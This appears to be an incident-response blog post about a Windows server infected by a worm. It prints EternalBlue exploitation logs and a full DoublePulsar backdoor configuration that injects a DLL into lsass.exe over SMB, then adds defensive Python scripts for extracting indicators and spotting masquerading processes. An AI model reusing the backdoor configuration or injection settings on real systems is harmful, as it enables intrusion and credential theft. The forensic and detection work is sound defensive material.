Recently a user reported that one of our servers always felt sluggish and laggy, so today I remoted in to take a look.
Opening Task Manager showed very low CPU usage, and memory was within an acceptable range (10 GB of 64 GB in use). I have a habit, though, of not relying on the built-in Task Manager for resource monitoring, so I dropped Process Explorer (procexp) onto the box and looked again. It showed rundll32.exe consuming roughly 62% of the CPU while loading and executing a DLL named HalPluginServices.dll. Having read Windows Internals, I had some notion of what the Hal (Hardware Abstraction Layer) prefix means. Running alongside it, under svhost.exe, was spoolsv.exe; at first glance both looked like fairly system-level executables. Hovering over spoolsv.exe to check its image path showed: C:\Windows\SpeechsTracing\spoolsv.exe. Seeing the Speech prefix, I wondered whether it was related to Microsoft's Narrator feature, and since the directory happened to contain a Microsoft subdirectory, I almost believed it. But I noticed that spoolsv.exe was spawning cmd, and out of curiosity I checked what command it was running:
C:\Windows\SpeechsTracing\Microsoft\svhost.exe > stage1.txt
Out of curiosity I then opened stage1.txt and found the following:
[*] Connecting to target for exploitation.
[+] Connection established for exploitation.
[*] Pinging backdoor...
[+] Backdoor not installed, game on.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump ( bytes):
0x00000000 6e 6f Windows Server
0x00000010 6e R2 Enterpris
0x00000020 e Service P
0x00000030 6b ack .
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet
................DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming
[+] Sending SMBv2 buffers
..........DONE.
[+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!
DONE.
[*] Receiving response from exploit packet
This is plainly an SMB exploit. Next I looked at stage2.txt in the same directory:
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
[+] Backdoor returned code: - Success!
[+] Ping returned Target architecture: x64 (-bit) - XOR Key: 0xEE83B3A2
SMB Connection string is: Windows Server R2 Enterprise Service Pack
Target OS is: R2 x64
Target SP is:
[+] Backdoor installed
[+] DLL built
[.] Sending shellcode to inject DLL
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Command completed successfully
<config xmlns="urn:trch" id="a748cf79831d6c2444050f18217611549fe3f619" configversion="1.3.1.0" name="Doublepulsar" version="1.3.1" schemaversion="2.0.0">
<inputparameters>
<parameter name="NetworkTimeout" description="Timeout for blocking network calls (in seconds). Use -1 for no timeout." type="S16" format="Scalar" valid="true">
<default></default>
<value></value>
</parameter>
<parameter name="TargetIp" description="Target IP Address" type="IPv4" format="Scalar" valid="true">
<value>10.244.251.57</value>
</parameter>
<parameter name="TargetPort" description="Port used by the Double Pulsar back door" type="TcpPort" format="Scalar" valid="true">
<default></default>
<value></value>
</parameter>
<parameter name="LogFile" description="Where to write log file" type="String" format="Scalar" required="false"></parameter>
<parameter name="OutConfig" description="Where to write output parameters file" type="String" format="Scalar" valid="true">
<default>stdout</default>
<value>stdout</value>
</parameter>
<parameter name="ValidateOnly" description="Stop execution after parameter validation" type="Boolean" format="Scalar" valid="true">
<default>false</default>
<value>false</value>
</parameter>
<paramchoice name="Protocol" description="Protocol for the backdoor to speak">
<default>SMB</default>
<value>SMB</value>
<paramgroup name="SMB" description="Ring 0 SMB (TCP 445) backdoor"></paramgroup>
<paramgroup name="RDP" description="Ring 0 RDP (TCP 3389) backdoor"></paramgroup>
</paramchoice>
<paramchoice name="Architecture" description="Architecture of the target OS">
<default>x64</default>
<value>x64</value>
<paramgroup name="x86" description="x86 32-bits"></paramgroup>
<paramgroup name="x64" description="x64 64-bits"></paramgroup>
</paramchoice>
<paramchoice name="Function" description="Operation for backdoor to perform">
<default>OutputInstall</default>
<value>RunDLL</value>
<paramgroup name="OutputInstall" description="Only output the install shellcode to a binary file on disk.">
<parameter name="OutputFile" description="Full path to the output file" type="String" format="Scalar"></parameter>
</paramgroup>
<paramgroup name="Ping" description="Test for presence of backdoor"></paramgroup>
<paramgroup name="RunDLL" description="Use an APC to inject a DLL into a user mode process.">
<parameter name="DllPayload" description="DLL to inject into user mode" type="LocalFile" format="Scalar" valid="true">
<value>C:\Windows\SpeechsTracing\Microsoft\\x64.dll</value>
</parameter>
<parameter name="DllOrdinal" description="The exported ordinal number of the DLL being injected to call" type="U32" format="Scalar" valid="true">
<default></default>
<value></value>
</parameter>
<parameter name="ProcessName" description="Name of process to inject into" type="String" format="Scalar" valid="true">
<default>lsass.exe</default>
<value>lsass.exe</value>
</parameter>
<parameter name="ProcessCommandLine" description="Command line of process to inject into" type="String" format="Scalar" valid="true">
<default></default>
<value></value>
</parameter>
</paramgroup>
<paramgroup name="RunShellcode" description="Run raw shellcode">
<parameter name="ShellcodeFile" description="Full path to the file containing shellcode" type="LocalFile" format="Scalar"></parameter>
<parameter name="ShellcodeData" description="Full path to the file containing shellcode to run" type="LocalFile" format="Scalar"></parameter>
</paramgroup>
<paramgroup name="Uninstall" description="Remove's backdoor from system"></paramgroup>
</paramchoice>
</inputparameters>
<outputparameters>
<paramchoice name="Function" description="Operation for backdoor to perform">
<paramgroup name="OutputInstall" description="Only output the install shellcode to a file on disk.">
<parameter name="ShellcodeFile" description="Full path to the file containing Double Pulsar shellcode installer" type="String" format="Scalar"></parameter>
<parameter name="ShellcodeData" description="Full path to the file containing Double Pulsar shellcode installer" type="LocalFile" format="Scalar"></parameter>
</paramgroup>
<paramgroup name="Ping" description="Test for presence of backdoor">
<parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></parameter>
</paramgroup>
<paramgroup name="RunDLL" description="Inject a DLL into a user mode process.">
<parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></parameter>
</paramgroup>
<paramgroup name="Uninstall" description="Remove's backdoor from system">
<parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></parameter>
</paramgroup>
</paramchoice>
</outputparameters>
</config>
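The XML above is the tool's configuration file, and during triage the useful facts in it are the effective parameter values (target IP, payload DLL, process targeted for injection, selected function) rather than the surrounding schema. The script below is an added example written for this write-up, not something recovered from the server; it assumes an explicit <value> overrides <default> and that a <paramchoice>'s <value> names the selected <paramgroup>, and it runs against a trimmed excerpt of the config shown above.

```python
"""Triage helper for a DoublePulsar-style XML configuration file.

Added example (not part of the original post). Resolves the effective value
of every input parameter (<value> if set, else <default>), records which
branch of each <paramchoice> is selected, and returns the handful of fields
an incident responder pulls out as indicators.
"""
import xml.etree.ElementTree as ET

# Trimmed excerpt of the config found on the compromised server; only the
# elements needed for triage are kept, the structure is unchanged.
SAMPLE_CONFIG = r"""<config xmlns="urn:trch" id="a748cf79831d6c2444050f18217611549fe3f619" configversion="1.3.1.0" name="Doublepulsar" version="1.3.1" schemaversion="2.0.0">
<inputparameters>
<parameter name="TargetIp" description="Target IP Address" type="IPv4" format="Scalar" valid="true">
<value>10.244.251.57</value>
</parameter>
<parameter name="OutConfig" description="Where to write output parameters file" type="String" format="Scalar" valid="true">
<default>stdout</default>
<value>stdout</value>
</parameter>
<paramchoice name="Protocol" description="Protocol for the backdoor to speak">
<default>SMB</default>
<value>SMB</value>
<paramgroup name="SMB" description="Ring 0 SMB (TCP 445) backdoor"></paramgroup>
<paramgroup name="RDP" description="Ring 0 RDP (TCP 3389) backdoor"></paramgroup>
</paramchoice>
<paramchoice name="Function" description="Operation for backdoor to perform">
<default>OutputInstall</default>
<value>RunDLL</value>
<paramgroup name="OutputInstall" description="Only output the install shellcode to a binary file on disk.">
<parameter name="OutputFile" description="Full path to the output file" type="String" format="Scalar"></parameter>
</paramgroup>
<paramgroup name="RunDLL" description="Use an APC to inject a DLL into a user mode process.">
<parameter name="DllPayload" description="DLL to inject into user mode" type="LocalFile" format="Scalar" valid="true">
<value>C:\Windows\SpeechsTracing\Microsoft\\x64.dll</value>
</parameter>
<parameter name="ProcessName" description="Name of process to inject into" type="String" format="Scalar" valid="true">
<default>lsass.exe</default>
<value>lsass.exe</value>
</parameter>
</paramgroup>
</paramchoice>
</inputparameters>
</config>
"""


def _local(tag):
    """Strip the default namespace: '{urn:trch}parameter' -> 'parameter'."""
    return tag.rsplit("}", 1)[-1]


def _effective(elem):
    """Explicit <value> wins over <default>; an empty or missing one yields ''.
    (Assumed semantics of the format, not documented on the page.)"""
    for child_name in ("value", "default"):
        for child in elem:
            if _local(child.tag) == child_name and child.text:
                return child.text.strip()
    return ""


def parse_config(xml_text):
    """Return tool metadata plus flat dicts of parameters and selected choices."""
    root = ET.fromstring(xml_text)
    inputs = next(e for e in root if _local(e.tag) == "inputparameters")
    params, choices = {}, {}

    def walk(elem):
        for child in elem:
            kind = _local(child.tag)
            if kind == "parameter":
                params[child.get("name")] = _effective(child)
            elif kind == "paramchoice":
                choices[child.get("name")] = _effective(child)
                walk(child)          # parameters nested in the choice's groups
            elif kind == "paramgroup":
                walk(child)

    walk(inputs)
    return {"tool": root.get("name"), "version": root.get("version"),
            "params": params, "choices": choices}


def extract_iocs(xml_text):
    """The fields worth recording from such a config during an investigation."""
    cfg = parse_config(xml_text)
    p, c = cfg["params"], cfg["choices"]
    return {
        "tool": cfg["tool"],
        "function": c.get("Function", ""),
        "protocol": c.get("Protocol", ""),
        "target_ip": p.get("TargetIp", ""),
        "dll_payload": p.get("DllPayload", ""),
        "inject_into": p.get("ProcessName", ""),
    }


if __name__ == "__main__":
    for key, val in extract_iocs(SAMPLE_CONFIG).items():
        print(f"{key:12} {val}")
```

Run on the excerpt it reports Function=RunDLL over SMB against 10.244.251.57, with x64.dll from the SpeechsTracing directory injected into lsass.exe, which is exactly the picture the stage2.txt log paints; the same parser applied to every config file in the directory gives a quick inventory of what the worm was pointed at.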
At this point it was basically clear that this was a worm; the directory also contained the earlier EternalBlue package (Eternalblue-2.2.0.fb). Then I realized what had been going on: the malware author had it detect when the user runs Task Manager and automatically kill rundll32.exe, creating the illusion that the system was using very little CPU. I only found the problem because I ran procexp.
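The two lessons of this incident, a system binary name running from an unexpected directory and a process listing that changes depending on which tool takes it, both translate into simple checks. Below is an added example (not from the original post) that runs those checks over a constructed process listing modelled on what was seen here; the expected-directory table, the pids, the HalPluginServices.dll path and the second listing are assumptions built for the example.

```python
"""Spot masquerading system binaries and listings that disagree between tools.

Added example, not part of the original post. Each input row mirrors what
tasklist or Process Explorer would show (name, image path, command line);
the expected-directory table is a deliberately small assumption.
"""
import ntpath

# Directories from which these Windows binaries are expected to run on a
# default install (assumption for this example; extend for a real allow-list).
TRUSTED_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
SYSTEM_BINARIES = {"spoolsv.exe", "svchost.exe", "rundll32.exe", "lsass.exe", "cmd.exe"}

# Names one character away from a real system binary are a common lure.
LOOKALIKES = {"svhost.exe": "svchost.exe"}


def _norm_dir(path):
    """Directory part of a Windows path, lower-cased for comparison."""
    return ntpath.dirname(path).lower().rstrip("\\")


def rundll32_dll(cmdline):
    """Return the DLL argument of a rundll32 command line ('<dll>,<entry> ...')."""
    parts = cmdline.strip().split(None, 1)
    if len(parts) < 2:
        return None
    rest = parts[1].strip()
    if rest.startswith('"'):                     # quoted path, may contain spaces
        end = rest.find('"', 1)
        return rest[1:end] if end > 0 else None
    head = rest.split(",", 1)[0].split()
    return head[0] if head else None


def check_process(proc):
    """Return the reasons a process row looks suspicious (empty list if none)."""
    name = proc["name"].lower()
    reasons = []
    if name in LOOKALIKES:
        reasons.append(f"{proc['name']} mimics {LOOKALIKES[name]}")
    if name in SYSTEM_BINARIES and _norm_dir(proc["path"]) not in TRUSTED_DIRS:
        reasons.append(f"{proc['name']} running from {ntpath.dirname(proc['path'])}")
    if name == "rundll32.exe":
        dll = rundll32_dll(proc.get("cmdline", ""))
        if dll and _norm_dir(dll) not in TRUSTED_DIRS:
            reasons.append(f"rundll32.exe loading {dll} from outside the system directories")
    return reasons


def triage(processes):
    """Map pid -> reasons for every row that trips a check."""
    return {p["pid"]: r for p in processes if (r := check_process(p))}


def listing_diff(listing_a, listing_b):
    """Pids present in one listing but not the other; a process that vanishes
    whenever Task Manager is open shows up here."""
    a = {p["pid"] for p in listing_a}
    b = {p["pid"] for p in listing_b}
    return {"only_in_a": sorted(a - b), "only_in_b": sorted(b - a)}


# Constructed listing modelled on the incident: pids are made up, and the
# HalPluginServices.dll path and entry point are assumed (the post gives only the DLL name).
SAMPLE_PROCESSES = [
    {"pid": 1204, "name": "spoolsv.exe", "path": r"C:\Windows\System32\spoolsv.exe", "cmdline": "spoolsv.exe"},
    {"pid": 3391, "name": "spoolsv.exe", "path": r"C:\Windows\SpeechsTracing\spoolsv.exe", "cmdline": "spoolsv.exe"},
    {"pid": 3402, "name": "svhost.exe", "path": r"C:\Windows\SpeechsTracing\Microsoft\svhost.exe", "cmdline": "svhost.exe"},
    {"pid": 3410, "name": "rundll32.exe", "path": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\SpeechsTracing\HalPluginServices.dll,Start"},
    {"pid": 700, "name": "rundll32.exe", "path": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]
# The same host as Task Manager saw it in the post: the rundll32.exe worker is gone.
TASKMGR_VIEW = [p for p in SAMPLE_PROCESSES if p["pid"] != 3410]

if __name__ == "__main__":
    for pid, reasons in triage(SAMPLE_PROCESSES).items():
        print(pid, "; ".join(reasons))
    print(listing_diff(SAMPLE_PROCESSES, TASKMGR_VIEW))
```

The path check catches the fake spoolsv.exe and the rundll32.exe worker even though both names are legitimate, the lookalike table catches svhost.exe, and diffing a listing taken with Task Manager open against one taken by a second tool (or a scheduled tasklist run) exposes the process that hides itself the way this worm did.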